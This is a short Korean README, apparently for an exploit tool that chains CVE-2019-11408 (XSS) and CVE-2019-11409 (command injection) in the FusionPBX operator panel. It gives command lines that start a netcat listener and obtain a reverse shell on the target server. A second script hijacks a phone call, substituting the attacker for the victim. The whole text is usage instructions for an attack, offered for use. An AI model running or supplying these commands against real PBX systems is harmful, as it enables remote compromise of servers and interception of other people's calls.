
CVE-2019-11408(운영자 패널의 XSS) 및 CVE-2019-11409(운영자 패널의 명령 주입) 취약점 연쇄 공격.
이 간단한 코드는 Dustin Cobb가 Caller ID를 사용한 RCE – FusionPBX의 다중 취약점에서 소개한 연쇄 취약점의 구현을 완성하려고 시도합니다.
netcat 리스너를 시작합니다.x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat 리스너에 연결되어 리버스 셸을 제공합니다.통화에서 Call-ID, from-tag, to-tag를 알고 있다면 아래 코드를 실행하여 통화에서 피해자 대신 자신을 대체할 수 있습니다.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}